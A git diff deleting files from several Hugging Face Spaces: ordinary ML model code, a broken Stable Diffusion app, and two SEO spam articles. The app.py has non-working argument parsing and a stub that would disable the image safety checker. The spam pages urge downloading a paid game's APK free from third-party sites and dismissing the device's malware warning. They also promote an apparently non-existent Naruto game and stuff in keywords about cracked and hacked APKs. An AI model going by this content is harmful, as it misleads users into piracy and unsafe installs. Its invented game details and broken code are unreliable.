a/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py b/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py deleted file mode 100644 index abc8f99cf30b3f3057e39bb61f16ab62867aa1ed..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py +++ /dev/null @@ -1,88 +0,0 @@ -#!/usr/bin/env python3 - -# Copyright 2020 Tomoki Hayashi -# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) - -"""Variance predictor related modules.""" - -import torch - -from typeguard import check_argument_types - -from espnet.nets.pytorch_backend.transformer.layer_norm import LayerNorm - - -class VariancePredictor(torch.nn.Module): - """Variance predictor module. - - This is a module of variacne predictor described in `FastSpeech 2: - Fast and High-Quality End-to-End Text to Speech`_. - - .. _`FastSpeech 2: Fast and High-Quality End-to-End Text to Speech`: - https://arxiv.org/abs/2006.04558 - - """ - - def __init__( - self, - idim: int, - n_layers: int = 2, - n_chans: int = 384, - kernel_size: int = 3, - bias: bool = True, - dropout_rate: float = 0.5, - ): - """Initilize duration predictor module. - - Args: - idim (int): Input dimension. - n_layers (int, optional): Number of convolutional layers. - n_chans (int, optional): Number of channels of convolutional layers. - kernel_size (int, optional): Kernel size of convolutional layers. - dropout_rate (float, optional): Dropout rate. - - """ - assert check_argument_types() - super().__init__() - self.conv = torch.nn.ModuleList() - for idx in range(n_layers): - in_chans = idim if idx == 0 else n_chans - self.conv += [ - torch.nn.Sequential( - torch.nn.Conv1d( - in_chans, - n_chans, - kernel_size, - stride=1, - padding=(kernel_size - 1) // 2, - bias=bias, - ), - torch.nn.ReLU(), - LayerNorm(n_chans, dim=1), - torch.nn.Dropout(dropout_rate), - ) - ] - self.linear = torch.nn.Linear(n_chans, 1) - - def forward(self, xs: torch.Tensor, x_masks: torch.Tensor = None) -> torch.Tensor: - """Calculate forward propagation. - - Args: - xs (Tensor): Batch of input sequences (B, Tmax, idim). - x_masks (ByteTensor, optional): - Batch of masks indicating padded part (B, Tmax). - - Returns: - Tensor: Batch of predicted sequences (B, Tmax, 1). - - """ - xs = xs.transpose(1, -1) # (B, idim, Tmax) - for f in self.conv: - xs = f(xs) # (B, C, Tmax) - - xs = self.linear(xs.transpose(1, 2)) # (B, Tmax, 1) - - if x_masks is not None: - xs = xs.masked_fill(x_masks, 0.0) - - return xs diff --git a/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h b/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h deleted file mode 100644 index b2b88e8c46f19b6db0933163e57ccdb51180f517..0000000000000000000000000000000000000000 --- a/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h +++ /dev/null @@ -1,35 +0,0 @@ -/*! -************************************************************************************************** -* Deformable DETR -* Copyright (c) 2020 SenseTime. All Rights Reserved. -* Licensed under the Apache License, Version 2.0 [see LICENSE for details] -************************************************************************************************** -* Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -************************************************************************************************** -*/ - -#pragma once -#include - -namespace groundingdino { - -at::Tensor -ms_deform_attn_cpu_forward( - const at::Tensor &value, - const at::Tensor &spatial_shapes, - const at::Tensor &level_start_index, - const at::Tensor &sampling_loc, - const at::Tensor &attn_weight, - const int im2col_step); - -std::vector -ms_deform_attn_cpu_backward( - const at::Tensor &value, - const at::Tensor &spatial_shapes, - const at::Tensor &level_start_index, - const at::Tensor &sampling_loc, - const at::Tensor &attn_weight, - const at::Tensor &grad_output, - const int im2col_step); - -} // namespace groundingdino diff --git a/spaces/sharmaanupam/eigenvectors/__init__.py b/spaces/sharmaanupam/eigenvectors/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/shayakh/sdrv51/app.py b/spaces/shayakh/sdrv51/app.py deleted file mode 100644 index 40835b892d37cfb178e0fd882b0d832eaaf36dc9..0000000000000000000000000000000000000000 --- a/spaces/shayakh/sdrv51/app.py +++ /dev/null @@ -1,189 +0,0 @@ -from diffusers import StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image - -model_id = 'SG161222/Realistic_Vision_V5.1_noVAE' -prefix = 'RAW photo,' - -scheduler = DPMSolverMultistepScheduler.from_pretrained(model_id, subfolder="scheduler") - -pipe = StableDiffusionPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - pipe_i2i = pipe_i2i.to("cuda") - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - - -def _parse_args(prompt, generator): - parser = argparse.ArgumentParser( - description="making it work." - ) - parser.add_argument( - "--no-half-vae", help="no half vae" - ) - - cmdline_args = parser.parse_args() - command = cmdline_args.command - conf_file = cmdline_args.conf_file - conf_args = Arguments(conf_file) - opt = conf_args.readArguments() - - if cmdline_args.config_overrides: - for config_override in cmdline_args.config_overrides.split(";"): - config_override = config_override.strip() - if config_override: - var_val = config_override.split("=") - assert ( - len(var_val) == 2 - ), f"Config override '{var_val}' does not have the form 'VAR=val'" - conf_args.add_opt(opt, var_val[0], var_val[1], force_override=True) - -def inference(prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt="", auto_prefix=False): - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - prompt = f"{prefix} {prompt}" if auto_prefix else prompt - - try: - if img is not None: - return img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - - - -def txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator): - - result = pipe( - prompt, - negative_prompt = neg_prompt, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -def img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - ratio = min(height / img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe_i2i( - prompt, - negative_prompt = neg_prompt, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - - def fake_safety_checker(images, **kwargs): - return result.images[0], [False] * len(images) - - pipe.safety_checker = fake_safety_checker - -css = """.main-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.main-div div h1{font-weight:900;margin-bottom:7px}.main-div p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -
      -
      -

      📷 Realistic Vision V5.1 📸

      -
      -

      - Demo for Realistic Vision V5.1 - Stable Diffusion model by Eugene. {"" if prefix else ""} - Running on {"GPU 🔥" if torch.cuda.is_available() else f"CPU ⚡"}. -

      -

      Please use the prompt template below to get an example of the desired generation results: -

      - -Prompt: -
      -* subject *, (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3 -
      -
      - -Example: a close up portrait photo of 26 y.o woman in wastelander clothes, long haircut, pale skin, slim body, background is city ruins,
      -(high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3 -
      -
      - -
      -Negative Prompt: -
      -(deformed iris, deformed pupils, semi-realistic, cgi, 3d, render, sketch, cartoon, drawing, anime:1.4), text, close up, cropped, out of frame, worst quality,
      -low quality, jpeg artifacts, ugly, duplicate, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, mutation, deformed, blurry,
      -dehydrated, bad anatomy, bad proportions, extra limbs, cloned face, disfigured, gross proportions, malformed limbs, missing arms, missing legs, extra arms,
      -extra legs, fused fingers, too many fingers, long neck -
      - -
      -Have Fun & Enjoy ⚡ //THAFX -
      - -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False,max_lines=2,placeholder=f"{prefix} [your prompt]").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - image_out = gr.Image(height=512) - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - auto_prefix = gr.Checkbox(label="Prefix styling tokens automatically (RAW photo,)", value=prefix, visible=prefix) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=5, maximum=15) - steps = gr.Slider(label="Steps", value=20, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - auto_prefix.change(lambda x: gr.update(placeholder=f"{prefix} [your prompt]" if x else "[Your prompt]"), inputs=auto_prefix, outputs=prompt, queue=False) - - inputs = [prompt, guidance, steps, width, height, seed, image, strength, neg_prompt, auto_prefix] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py b/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py deleted file mode 100644 index aa11d60db65fa98c140e7d75bdf985ff7ece8f18..0000000000000000000000000000000000000000 --- a/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py +++ /dev/null @@ -1,122 +0,0 @@ -# -------------------------------------------------------- -# Position embedding utils -# -------------------------------------------------------- - -from typing import Tuple - -import numpy as np -import torch - - -# -------------------------------------------------------- -# 2D sine-cosine position embedding -# References: -# Transformer: https://github.com/tensorflow/models/blob/master/official/nlp/transformer/model_utils.py -# MoCo v3: https://github.com/facebookresearch/moco-v3 -# -------------------------------------------------------- -def get_2d_sincos_pos_embed(embed_dim, grid_size, cls_token=False): - """ - grid_size: int of the grid height and width - return: - pos_embed: [grid_size*grid_size, embed_dim] or [1+grid_size*grid_size, embed_dim] (w/ or w/o cls_token) - """ - grid_h = np.arange(grid_size, dtype=np.float32) - grid_w = np.arange(grid_size, dtype=np.float32) - grid = np.meshgrid(grid_w, grid_h) # here w goes first - grid = np.stack(grid, axis=0) - - grid = grid.reshape([2, 1, grid_size, grid_size]) - pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid) - if cls_token: - pos_embed = np.concatenate([np.zeros([1, embed_dim]), pos_embed], axis=0) - return pos_embed - - -def get_2d_sincos_pos_embed_from_grid(embed_dim, grid): - assert embed_dim % 2 == 0 - - # use half of dimensions to encode grid_h - emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2) - emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2) - - emb = np.concatenate([emb_h, emb_w], axis=1) # (H*W, D) - return emb - - -def get_1d_sincos_pos_embed_from_grid(embed_dim, pos): - """ - embed_dim: output dimension for each position - pos: a list of positions to be encoded: size (M,) - out: (M, D) - """ - assert embed_dim % 2 == 0 - omega = np.arange(embed_dim // 2, dtype=np.float) - omega /= embed_dim / 2.0 - omega = 1.0 / 10000 ** omega # (D/2,) - - pos = pos.reshape(-1) # (M,) - out = np.einsum("m,d->md", pos, omega) # (M, D/2), outer product - - emb_sin = np.sin(out) # (M, D/2) - emb_cos = np.cos(out) # (M, D/2) - - emb = np.concatenate([emb_sin, emb_cos], axis=1) # (M, D) - return emb - - -# -------------------------------------------------------- -# Interpolate position embeddings for high-resolution -# References: -# DeiT: https://github.com/facebookresearch/deit -# -------------------------------------------------------- -def interpolate_pos_embed(model, checkpoint_model, pos_embed_key): - if pos_embed_key in checkpoint_model: - pos_embed_checkpoint = checkpoint_model[pos_embed_key] - embedding_size = pos_embed_checkpoint.shape[-1] - num_patches = model.num_patches - if pos_embed_key.startswith("decoder"): - num_extra_tokens = model.decoder_pos_embed.shape[-2] - num_patches - else: - num_extra_tokens = model.pos_embed.shape[-2] - num_patches - # height (== width) for the checkpoint position embedding - orig_size = int((pos_embed_checkpoint.shape[-2] - num_extra_tokens) ** 0.5) - # height (== width) for the new position embedding - new_size = int(num_patches ** 0.5) - # class_token and dist_token are kept unchanged - if orig_size != new_size: - print( - "Position interpolate from %dx%d to %dx%d" - % (orig_size, orig_size, new_size, new_size) - ) - extra_tokens = pos_embed_checkpoint[:, :num_extra_tokens] - # only the position tokens are interpolated - pos_tokens = pos_embed_checkpoint[:, num_extra_tokens:] - pos_tokens = pos_tokens.reshape( - -1, orig_size, orig_size, embedding_size - ).permute(0, 3, 1, 2) - pos_tokens = torch.nn.functional.interpolate( - pos_tokens, - size=(new_size, new_size), - mode="bicubic", - align_corners=False, - ) - pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2) - new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1) - checkpoint_model[pos_embed_key] = new_pos_embed - - -def interpolate_pos_embed_online( - pos_embed, orig_size: Tuple[int], new_size: Tuple[int], num_extra_tokens: int -): - extra_tokens = pos_embed[:, :num_extra_tokens] - pos_tokens = pos_embed[:, num_extra_tokens:] - embedding_size = pos_tokens.shape[-1] - pos_tokens = pos_tokens.reshape( - -1, orig_size[0], orig_size[1], embedding_size - ).permute(0, 3, 1, 2) - pos_tokens = torch.nn.functional.interpolate( - pos_tokens, size=new_size, mode="bicubic", align_corners=False, - ) - pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2) - new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1) - return new_pos_embed diff --git a/spaces/shivammehta25/Diff-TTSG/setup.py b/spaces/shivammehta25/Diff-TTSG/setup.py deleted file mode 100644 index ceb91ddb4ed53e05ae72ceb064545945fea2dd06..0000000000000000000000000000000000000000 --- a/spaces/shivammehta25/Diff-TTSG/setup.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -import os - -import numpy -import pkg_resources -from Cython.Build import cythonize -from setuptools import Extension, find_packages, setup - -exts = [ - Extension( - name="diff_ttsg.utils.monotonic_align.core", - sources=["diff_ttsg/utils/monotonic_align/core.pyx"], - ) -] - -setup( - name="diff_ttsg", - version="0.0.1", - description="Denoising probabilistic integrated speech and gesture synthesis", - author="Shivam Mehta", - author_email="shivam.mehta25@gmail.com", - url="https://shivammehta25.github.io/Diff-TTSG/", - install_requires=[ - str(r) - for r in pkg_resources.parse_requirements( - open(os.path.join(os.path.dirname(__file__), "requirements.txt")) - ) - ], - include_dirs=[numpy.get_include()], - packages=find_packages(exclude=["tests", "tests/*", "examples", "examples/*"]), - # use this to customize global commands available in the terminal after installing the package - entry_points={ - "console_scripts": [ - ] - }, - ext_modules=cythonize(exts, language_level=3), -) diff --git a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py b/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py deleted file mode 100644 index 2906fc5a84b8c3cf64af778f8c78938d57d2f7da..0000000000000000000000000000000000000000 --- a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import gvp_transformer -from . import util -from . import multichain_util diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md deleted file mode 100644 index 14bdd5884839e5a25ad249025e532ba711588d18..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md +++ /dev/null @@ -1,94 +0,0 @@ -
      -

      Download Bloons TD 6 APK No Mod: A Guide for Android Users

      -

      If you are a fan of tower defense games, you might have heard of Bloons TD 6, the latest installment in the popular Bloons series. Developed and published by Ninja Kiwi, this game offers hours of fun and strategy with its colorful graphics, addictive gameplay, and diverse content. In this article, we will show you how to download Bloons TD 6 APK no mod for your Android device, and give you some tips and tricks to help you pop those pesky bloons.

      -

      Features of Bloons TD 6

      -

      Bloons TD 6 is a game that combines 3D graphics and line-of-sight mechanics with the classic tower defense formula. Your goal is to prevent enemy balloons, or bloons, from reaching the end of the path by placing monkey towers along the way. Each tower has its own strengths and weaknesses, and can be upgraded with different paths and abilities. Here are some of the features that make Bloons TD 6 stand out from other tower defense games:

      -

      download bloons td 6 apk no mod


      Download Ziphttps://ssurll.com/2uO0J4



      -
        -
      • 23 monkey towers with 3 upgrade paths and unique activated abilities. You can choose from dart monkeys, boomerang monkeys, sniper monkeys, ninja monkeys, bomb shooters, ice monkeys, glue gunners, super monkeys, helicopter pilots, alchemists, druids, banana farms, spike factories, monkey villages, mortar monkeys, engineer monkeys, dartling gunners, beast handlers, and more. Each tower has its own personality and style, and can be customized with different skins and voiceovers.
      • -
      • 14 heroes with 20 signature upgrades and 2 special abilities. Heroes are powerful units that level up automatically during the game. You can choose from Quincy the archer, Gwendolin the pyromaniac, Striker Jones the artillery commander, Obyn Greenfoot the forest guardian, Captain Churchill the tank driver, Benjamin the hacker, Ezili the voodoo monkey, Pat Fusty the giant ape, Adora the sun goddess, Brickell the naval commander, Etienne the drone operator, Sauda the sword master, Psi the psychic monkey, or Admiral Brickell Jr. the mini submarine. Each hero has its own backstory and voice lines.
      • -
      • 4-player co-op mode and online content browser. You can team up with up to three other players online and share your monkey money, lives, and powers. You can also create your own challenges and odysseys using the content browser, and share them with other players or play the most liked and played community content.
      • -
      • Regular updates, boss events, odysseys, quests, and more. The game is constantly updated with new features and content. You can participate in boss events where you face off against fearsome boss bloons with special abilities. You can also embark on odysseys where you play a series of maps with limited towers and upgrades. You can also complete daily and weekly quests to earn rewards and trophies.
      • -
      -

      Bloons TD 6 is a game that will keep you entertained and challenged for a long time. Whether you are a casual or hardcore player, you will find something to enjoy in this game.

      -

      How to Download Bloons TD 6 APK No Mod

      -

      If you want to play Bloons TD 6 on your Android device, you have two options. You can either buy the game from the Google Play Store for $4.99, or you can download the APK file for free from a third-party source. The APK file is a package that contains the game's installation files and data. However, downloading the APK file from an unknown source can be risky, as it may contain viruses or malware that can harm your device. Therefore, you should be careful when choosing where to download the APK file from. Here are the steps to download Bloons TD 6 APK no mod safely and easily:

      -
        -
      1. Find a reliable source for the APK file. You can search online for websites that offer Bloons TD 6 APK no mod downloads, but make sure to check the reviews and ratings of the site before downloading anything. You can also use a trusted APK downloader app, such as APKPure or APKMirror, to find and download the APK file. Alternatively, you can ask a friend who has the game to share the APK file with you via Bluetooth or email.
      2. -
      3. Enable unknown sources on your device. Before you can install the APK file, you need to allow your device to install apps from sources other than the Google Play Store. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to grant permission to the app or browser that you are using to download the APK file.
      4. -
      5. Download and install the APK file. Once you have found and verified the APK file, tap on it to start the download process. You may see a warning message that says "This type of file can harm your device". Ignore it and tap OK. After the download is complete, tap on the APK file again to start the installation process. Follow the instructions on the screen and wait for the installation to finish.
      6. -
      7. Launch the game and enjoy. After the installation is done, you can find the Bloons TD 6 icon on your home screen or app drawer. Tap on it to launch the game and start popping bloons. You may need to grant some permissions to the game, such as access to storage and network. You may also need to verify your age and accept the terms of service.
      8. -
      -

      Congratulations, you have successfully downloaded Bloons TD 6 APK no mod for your Android device. Now you can enjoy this amazing game without spending any money.

      -

      Tips and Tricks for Bloons TD 6

      -

      Bloons TD 6 is a game that requires strategy and skill to master. There are many factors that affect your performance, such as the map layout, the bloon types, the tower combinations, and more. To help you improve your game, here are some tips and tricks that you should know:

      -
        -
      • Place your hero monkeys early to level them up faster. Hero monkeys are powerful units that gain experience and unlock new abilities as they pop bloons. The sooner you place them on the map, the more experience they will get and the more useful they will be in later rounds.
      • -
      • Pay attention to the range and placement of your towers. Different towers have different ranges and attack patterns, which affect how they interact with bloons and other towers. For example, some towers can shoot over obstacles, while others cannot. Some towers can pop lead bloons, while others cannot. Some towers can hit camo bloons, while others cannot. You should place your towers strategically to cover as much area as possible and deal with different bloon types effectively.
      • -
      • Use military towers to deal with specific bloon types. Military towers are towers that use weapons or vehicles to attack bloons. They include sniper monkeys, bomb shooters, ice monkeys, helicopter pilots, mortar monkeys, engineer monkeys, dartling gunners, beast handlers, and Admiral Brickell Jr. These towers have special abilities or upgrades that can help you deal with certain bloon types that other towers may struggle with. For example, sniper monkeys can pop camo bloons from anywhere on the map; bomb shooters can pop black bloons with frag bombs; ice monkeys can freeze MOAB-class bloons with absolute zero; helicopter pilots can follow your mouse cursor or patrol a specific area; mortar monkeys can target any spot on the map; engineer monkeys can deploy sentry guns or overclock other towers; dartling gunners can fire a powerful laser beam or a barrage of rockets; beast handlers can summon a pack of wolves or a giant bear; and Admiral Brickell Jr. can launch torpedoes or a nuclear strike.
      • -
      • Use magic towers to buff your units. Magic towers are towers that use magic or supernatural powers to attack bloons. They include super monkeys, alchemists, druids, and Psi. These towers have abilities or upgrades that can buff your units or debuff the bloons. For example, super monkeys can become the sun god or the dark champion; alchemists can apply acid or plasma to your towers' projectiles; druids can generate extra cash or lives; and Psi can manipulate the bloons' speed or direction.
      • -
      • Check out the powers menu for helpful items. Powers are items that you can use during the game to give you an edge over the bloons. They include road spikes, monkey glue, monkey boost, thrifty, cash drop, banana farmer, portable lake, pontoon, camo trap, MOAB mine, MOAB assassin, MOAB glue, MOAB shove, super monkey storm, and tech bot. You can buy powers with monkey money or earn them from quests or events. You can also use insta-monkeys, which are pre-upgraded towers that you can place instantly on the map.
      • -
      -

      Bloons TD 6 is a game that requires you to think and plan ahead. By using these tips and tricks, you can improve your strategy and pop more bloons.

      -

      download bloons tower defense 6 apk without mod
      -how to download btd6 apk for android no mod
      -download latest version of bloons td 6 apk unmodded
      -where can I download bloons td 6 apk original
      -download bloons td 6 apk free no mod
      -download bloons td 6 apk full version no mod
      -download bloons td 6 apk from official site no mod
      -download bloons td 6 apk with obb file no mod
      -download bloons td 6 apk offline no mod
      -download bloons td 6 apk updated no mod
      -download bloons td 6 apk cracked no mod
      -download bloons td 6 apk safe no mod
      -download bloons td 6 apk legit no mod
      -download bloons td 6 apk hack free no mod
      -download bloons td 6 apk premium no mod
      -download bloons td 6 apk unlimited money no mod
      -download bloons td 6 apk pro no mod
      -download bloons td 6 apk unlocked no mod
      -download bloons td 6 apk mod free no root
      -download bloons td 6 apk mod menu no root
      -download bloons td 6 apk cheat engine no root
      -download bloons td 6 apk trainer no root
      -download bloons td 6 apk patcher no root
      -download bloons td 6 apk installer no root
      -download bloons td 6 apk generator no root
      -download bloons td 6 apk direct link no root
      -download bloons td 6 apk mirror link no root
      -download bloons td 6 apk mediafire link no root
      -download bloons td 6 apk mega link no root
      -download bloons td 6 apk google drive link no root
      -download bloons td 6 apk dropbox link no root
      -download bloons td 6 apk zippyshare link no root
      -download bloons td 6 apk reddit link no root
      -download bloons td 6 apk quora link no root
      -download bloons td 6 apk youtube link no root
      -download bloons td 6 apk review no root
      -download bloons td 6 apk guide no root
      -download bloons td 6 apk tutorial no root
      -download bloons td 6 apk tips and tricks no root
      -download bloons td 6 apk walkthrough no root
      -download bloons td 6 apk gameplay no root
      -download bloons td 6 apk best strategy no root
      -download bloons td 6 apk best towers no root
      -download bloons td 6 apk best upgrades no root
      -download bloons td 6 apk best heroes no root
      -download bloons td 6 apk best maps no root
      -download bloons td 6 apk best modes no root
      -download bloons td 6 apk best challenges no root
      -download bloons td 6 apk best achievements no root

      -

      Conclusion

      -

      Bloons TD 6 is a fun and challenging tower defense game that you can play on your Android device. It has many features and content that will keep you entertained for hours. You can download Bloons TD 6 APK no mod for free from a reliable source and install it on your device easily. You can also use some tips and tricks to help you master the game and pop more bloons. If you are looking for a game that combines 3D graphics, addictive gameplay, and diverse content, you should give Bloons TD 6 a try. You won't regret it.

      -

      FAQs

      -

      Here are some frequently asked questions about Bloons TD 6:

      -
        -
      1. Is Bloons TD 6 offline? Yes, you can play Bloons TD 6 offline without an internet connection. However, some features and content may require an internet connection, such as co-op mode, content browser, daily challenges, odysseys, quests, events, trophies, cloud save, and in-app purchases.
      2. -
      3. Is Bloons TD 6 free? No, Bloons TD 6 is not free on the Google Play Store. It costs $4.99 to buy the game. However, you can download Bloons TD 6 APK no mod for free from a third-party source if you don't want to pay for the game.
      4. -
      5. Is Bloons TD 6 modded? No, Bloons TD 6 APK no mod is not modded. It is the original version of the game without any modifications or cheats. If you want to play Bloons TD 6 with mods, you will need to find a different source for the APK file.
      6. -
      7. Is Bloons TD 6 safe? Yes, Bloons TD 6 is safe to play on your Android device. However, you should be careful when downloading the APK file from an unknown source, as it may contain viruses or malware that can harm your device. You should also scan the APK file with an antivirus app before installing it.
      8. -
      9. Is Bloons TD 6 fun? Yes, Bloons TD 6 is fun to play on your Android device. It has colorful graphics, addictive gameplay, and diverse content that will keep you entertained for hours. You can also play with your friends online or create your own challenges and odysseys using the content browser.
      10. -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md deleted file mode 100644 index 255747a64d7b2fcb8cf007292c02beb0e48a94e2..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md +++ /dev/null @@ -1,82 +0,0 @@ -
      -

      Naruto Ultimate Ninja Storm 5 APK Download V2.0 for Android

      -

      Are you a fan of Naruto, the popular manga and anime series? Do you want to experience the thrilling ninja action and adventure on your Android device? If yes, then you should download Naruto Ultimate Ninja Storm 5 APK, the latest version of the best-selling Naruto game franchise. In this article, we will tell you everything you need to know about this amazing game, including its features, how to download and install it, and some frequently asked questions.

      -

      Introduction

      -

      Naruto is one of the most popular and successful manga and anime series in the world, with millions of fans across the globe. The story follows Naruto Uzumaki, a young ninja who dreams of becoming the Hokage, the leader of his village. Along his journey, he meets many friends and foes, and faces many challenges and dangers. The series is known for its captivating plot, dynamic characters, and epic battles.

      -

      naruto ultimate ninja storm 5 apk download v2 0 apk for android


      Download File ✦✦✦ https://ssurll.com/2uNZ2z



      -

      What is Naruto Ultimate Ninja Storm 5?

      -

      Naruto Ultimate Ninja Storm 5 is a video game based on the Naruto series, developed by CyberConnect2 and published by Bandai Namco Entertainment. It is the fifth installment in the Naruto Ultimate Ninja Storm series, which started in 2008. The game features the original story of Naruto from the beginning to the end, as well as some original scenarios and characters. The game also covers the events of Boruto: Naruto Next Generations, the sequel to Naruto.

      -

      Why should you download Naruto Ultimate Ninja Storm 5 APK?

      -

      Naruto Ultimate Ninja Storm 5 APK is a modified version of the original game that allows you to play it on your Android device without any restrictions. You don't need to root your device or pay any money to enjoy this game. You can download it for free from a trusted source and install it easily on your device. By downloading Naruto Ultimate Ninja Storm 5 APK, you can enjoy the following benefits:

      -
        -
      • You can play the game offline without any internet connection.
      • -
      • You can access all the features and content of the game without any limitations.
      • -
      • You can unlock all the characters and customization options without any hassle.
      • -
      • You can update the game to the latest version without any problems.
      • -
      • You can play the game smoothly and without any lag or glitches.
      • -
      -

      Features of Naruto Ultimate Ninja Storm 5 APK

      -

      Naruto Ultimate Ninja Storm 5 APK is a feature-packed game that will keep you entertained for hours. Here are some of the main features of this game:

      -

      Stunning graphics and animations

      -

      The game boasts of high-quality graphics and animations that will make you feel like you are watching an anime episode. The game uses cel-shaded graphics that give it a unique and colorful look. The animations are fluid and realistic, especially during the cutscenes and battles. The game also has amazing sound effects and voice acting that add to the immersion.

      -

      Epic battles and gameplay modes

      -

      The game offers various gameplay modes that will suit your preferences and skills. You can choose from Story Mode, Adventure Mode, Free Battle Mode, Survival Mode, Tournament Mode, and more. Each mode has its own objectives and challenges that will test your abilities as a ninja. You can also customize your difficulty level and settings according to your liking.

      -

      The battles in this game are epic and exciting, as you can use various moves and techniques to defeat your opponents. You can use basic attacks, combos, throws, counters, dodges, chakra, jutsu, ultimate jutsu, awakening, and more. You can also switch between different characters during the battle and use their abilities. The game also features interactive environments that you can use to your advantage or disadvantage.

      -

      naruto ultimate storm apk for pc and mac with bluestacks
      -ultimate shippuden ninja impact storm apk free download filehippo
      -naruto shippuden ultimate ninja storm 5 mod apk android 1
      -download naruto ultimate ninja storm 5 v2 0 offline apk
      -naruto ultimate storm apk latest version 2023 update
